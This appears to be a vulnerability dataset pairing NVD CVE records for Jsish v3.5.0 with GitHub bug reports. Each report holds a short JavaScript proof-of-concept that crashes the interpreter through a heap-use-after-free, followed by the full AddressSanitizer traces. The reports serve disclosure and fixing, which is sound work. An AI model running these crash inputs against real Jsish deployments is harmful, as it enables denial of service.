https://api.github.com/repos/pcmacdon/jsish/issues/76/comments
0
2021-12-24T10:44:21Z
2022-01-12T02:15:38Z
https://github.com/pcmacdon/jsish/issues/76
1,088,309,178
76
3,125
CVE-2021-46500
2022-01-27T21:15:09.047
Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/85" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/85
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var JSEtest = [ 'aa', 'gg', 'hhh', 'mm', 'nn' ]; 'sort:' + JSEtest.sort(function (str, position) { return JSEtest.unshift('pop:' + JSEtest.pop()); }); !'concat:' + JSEtest.concat().every(function (E) { return 'sort:' + JSEtest.sort(function (str, position) { return JSEtest.unshift('pop:' + JSEtest.pop()); }); }); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0 READ of size 1 at 0x603000007458 thread T0 #0 0x5566730cf1c9 in jsi_ArgTypeCheck src/jsiFunc.c:207 #1 0x556673158c49 in jsi_FuncCallSub src/jsiProto.c:263 #2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796 #3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837 #4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264 #5 0x55667343515e in jsi_evalcode src/jsiEval.c:2204 #6 0x556673158834 in jsi_FuncCallSub src/jsiProto.c:220 #7 0x5566730d4fec in jsi_FunctionInvoke src/jsiFunc.c:777 #8 0x5566730d4fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970 #10 0x7f067f973311 (/lib/x86_64-linux-gnu/libc.so.6+0x42311) #11 0x7f067f9736b5 in qsort_r (/lib/x86_64-linux-gnu/libc.so.6+0x426b5) #12 0x55667318a611 in jsi_ArraySortCmd src/jsiArray.c:1065 #13 0x556673157818 in jsi_FuncCallSub src/jsiProto.c:244 #14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796 #15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837 #16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264 #17 0x55667343515e in jsi_evalcode src/jsiEval.c:2204 #18 0x556673158834 in jsi_FuncCallSub src/jsiProto.c:220 #19 0x5566730d4fec in jsi_FunctionInvoke src/jsiFunc.c:777 #20 0x5566730d4fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #21 0x55667319bf64 in jsi_ArrayFindSubCmd src/jsiArray.c:576 #22 0x55667319bf64 in jsi_ArrayEveryCmd src/jsiArray.c:663 #23 0x556673157818 in jsi_FuncCallSub src/jsiProto.c:244 #24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796 #25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837 #26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264 #27 0x55667343515e in jsi_evalcode src/jsiEval.c:2204 #28 0x556673439274 in jsi_evalStrFile src/jsiEval.c:2665 #29 0x55667312866a in Jsi_Main src/jsiInterp.c:936 #30 0x55667392d03a in jsi_main src/main.c:47 #31 0x7f067f952bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #32 0x5566730bc969 in _start (/usr/local/bin/jsish+0xe8969) 0x603000007458 is located 8 bytes inside of 32-byte region [0x603000007450,0x603000007470) freed by thread T0 here: #0 0x7f06805c17a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5566730dd6cf in Jsi_DecrRefCount src/jsiValue.c:52 previously allocated by thread T0 here: #0 0x7f06805c1d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55667312daa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck Shadow bytes around the buggy address: 0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd =>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd[fd]fd fd fa fa 0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd 0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck
https://api.github.com/repos/pcmacdon/jsish/issues/85/comments
2
2021-12-24T10:51:56Z
2021-12-26T22:47:18Z
https://github.com/pcmacdon/jsish/issues/85
1,088,313,003
85
3,126
CVE-2021-46501
2022-01-27T21:15:09.097
Jsish v3.5.0 was discovered to contain a heap-use-after-free via SortSubCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/86" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/86" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/86
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var JSEtest = [ 'aa', 'bb', 'cc' ]; var results = JSEtest; JSEtest.findIndex(function (kV) { JSEtest.sort(function (str, position) { results.push(kV); }); }); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==106201==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000018678 at pc 0x56468deff5a0 bp 0x7fff9a37c2a0 sp 0x7fff9a37c290 READ of size 8 at 0x60c000018678 thread T0 #0 0x56468deff59f in SortSubCmd src/jsiArray.c:958 #1 0x7fb68d0b0311 (/lib/x86_64-linux-gnu/libc.so.6+0x42311) #2 0x7fb68d0b027d (/lib/x86_64-linux-gnu/libc.so.6+0x4227d) #3 0x7fb68d0b027d (/lib/x86_64-linux-gnu/libc.so.6+0x4227d) #4 0x7fb68d0b06b5 in qsort_r (/lib/x86_64-linux-gnu/libc.so.6+0x426b5) #5 0x56468df02611 in jsi_ArraySortCmd src/jsiArray.c:1065 #6 0x56468decf818 in jsi_FuncCallSub src/jsiProto.c:244 #7 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796 #8 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837 #9 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264 #10 0x56468e1ad15e in jsi_evalcode src/jsiEval.c:2204 #11 0x56468ded0834 in jsi_FuncCallSub src/jsiProto.c:220 #12 0x56468de4cfec in jsi_FunctionInvoke src/jsiFunc.c:777 #13 0x56468de4cfec in Jsi_FunctionInvoke src/jsiFunc.c:789 #14 0x56468df0dc0b in jsi_ArrayFindSubCmd src/jsiArray.c:576 #15 0x56468df0dc0b in jsi_ArrayFindIndexCmd src/jsiArray.c:666 #16 0x56468decf818 in jsi_FuncCallSub src/jsiProto.c:244 #17 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796 #18 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837 #19 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264 #20 0x56468e1ad15e in jsi_evalcode src/jsiEval.c:2204 #21 0x56468e1b1274 in jsi_evalStrFile src/jsiEval.c:2665 #22 0x56468dea066a in Jsi_Main src/jsiInterp.c:936 #23 0x56468e6a503a in jsi_main src/main.c:47 #24 0x7fb68d08fbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #25 0x56468de34969 in _start (/usr/local/bin/jsish+0xe8969) 0x60c000018678 is located 56 bytes inside of 128-byte region [0x60c000018640,0x60c0000186c0) freed by thread T0 here: #0 0x7fb68dcfef30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x56468dea5972 in Jsi_Realloc src/jsiUtils.c:47 previously allocated by thread T0 here: #0 0x7fb68dcfef30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x56468dea5972 in Jsi_Realloc src/jsiUtils.c:47 SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:958 in SortSubCmd Shadow bytes around the buggy address: 0x0c187fffb070: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c187fffb090: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c187fffb0a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c187fffb0c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd[fd] 0x0c187fffb0d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c187fffb100: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c187fffb110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==106201==ABORTING ```
Heap-use-after-free src/jsiArray.c:958 in SortSubCmd
https://api.github.com/repos/pcmacdon/jsish/issues/86/comments
0
2021-12-24T10:52:55Z
2021-12-26T22:47:42Z
https://github.com/pcmacdon/jsish/issues/86
1,088,313,466
86
3,127
CVE-2021-46502
2022-01-27T21:15:09.143
Jsish v3.5.0 was discovered to contain a heap-use-after-free via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/87" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/87" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/87
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var x = 3; if (("ab".replace("b", "ab".constructor).replace("b", "ab".constructor)!=="aa") || (x!==undefined)) { throw "Err-value!"; } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001cf3 at pc 0x7fae379c366e bp 0x7ffdcb94e5a0 sp 0x7ffdcb94dd48 READ of size 2 at 0x602000001cf3 thread T0 #0 0x7fae379c366d (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) #1 0x55927a403f60 in Jsi_Strlen src/jsiChar.c:29 #2 0x55927a508a57 in Jsi_DSAppendLen src/jsiDString.c:99 #3 0x55927a508e7f in Jsi_DSAppend src/jsiDString.c:129 #4 0x55927a40d4b8 in StringReplaceCmd src/jsiString.c:705 #5 0x55927a3ed818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55927a6b771a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55927a6b771a in jsiEvalFunction src/jsiEval.c:837 #8 0x55927a6b771a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55927a6cb15e in jsi_evalcode src/jsiEval.c:2204 #10 0x55927a6cf274 in jsi_evalStrFile src/jsiEval.c:2665 #11 0x55927a3be66a in Jsi_Main src/jsiInterp.c:936 #12 0x55927abc303a in jsi_main src/main.c:47 #13 0x7fae36de1bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #14 0x55927a352969 in _start (/usr/local/bin/jsish+0xe8969) 0x602000001cf4 is located 0 bytes to the right of 4-byte region [0x602000001cf0,0x602000001cf4) freed by thread T0 here: #0 0x7fae37a507a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55927a412c19 in StringConstructor src/jsiString.c:33 previously allocated by thread T0 here: #0 0x7fae37a50b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x55927a3c3a22 in Jsi_Malloc src/jsiUtils.c:52 SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) Shadow bytes around the buggy address: 0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd 0x0c047fff8370: fa fa 00 07 fa fa 00 fa fa fa 00 00 fa fa 00 00 0x0c047fff8380: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8390: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa[fd]fa 0x0c047fff83a0: fa fa fd fa fa fa 04 fa fa fa fa fa fa fa fa fa 0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d)
https://api.github.com/repos/pcmacdon/jsish/issues/87/comments
0
2021-12-24T10:53:39Z
2021-12-26T22:08:17Z
https://github.com/pcmacdon/jsish/issues/87
1,088,313,832
87
3,128
CVE-2021-46503
2022-01-27T21:15:09.187
Jsish v3.5.0 was discovered to contain a heap-use-after-free via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/88" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/88" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/pcmacdon/jsish/issues/88
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript try { var JSEtest = new String('test string'); var At = JSEtest.constructor(JSEtest); } catch (e) { } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==88163==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001bf0 at pc 0x7f8c725b9733 bp 0x7ffeb1c188d0 sp 0x7ffeb1c18078 READ of size 11 at 0x602000001bf0 thread T0 #0 0x7f8c725b9732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x5576fd6ba249 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x5576fd6ba249 in Jsi_StrdupLen src/jsiChar.c:74 #3 0x5576fd6c8ac0 in StringConstructor src/jsiString.c:35 #4 0x5576fd6a3818 in jsi_FuncCallSub src/jsiProto.c:244 #5 0x5576fd96d71a in jsiFunctionSubCall src/jsiEval.c:796 #6 0x5576fd96d71a in jsiEvalFunction src/jsiEval.c:837 #7 0x5576fd96d71a in jsiEvalCodeSub src/jsiEval.c:1264 #8 0x5576fd98115e in jsi_evalcode src/jsiEval.c:2204 #9 0x5576fd985274 in jsi_evalStrFile src/jsiEval.c:2665 #10 0x5576fd67466a in Jsi_Main src/jsiInterp.c:936 #11 0x5576fde7903a in jsi_main src/main.c:47 #12 0x7f8c719afbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #13 0x5576fd608969 in _start (/usr/local/bin/jsish+0xe8969) 0x602000001bf0 is located 0 bytes inside of 12-byte region [0x602000001bf0,0x602000001bfc) freed by thread T0 here: #0 0x7f8c7261e7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x5576fd6c8c19 in StringConstructor src/jsiString.c:33 previously allocated by thread T0 here: #0 0x7f8c7261eb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x5576fd679a22 in Jsi_Malloc src/jsiUtils.c:52 SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0c047fff8320: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8330: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd =>0x0c047fff8370: fa fa 00 07 fa fa 00 00 fa fa 00 04 fa fa[fd]fd 0x0c047fff8380: fa fa 00 04 fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==88163==ABORTING ```
Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
https://api.github.com/repos/pcmacdon/jsish/issues/88/comments
0
2021-12-24T10:54:21Z
2021-12-26T20:57:24Z
https://github.com/pcmacdon/jsish/issues/88
1,088,314,163
88
3,129
CVE-2021-46504
2022-01-27T21:15:09.233
There is an Assertion 'vp != resPtr' failed at jsiEval.c in Jsish v3.5.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/51" } ]
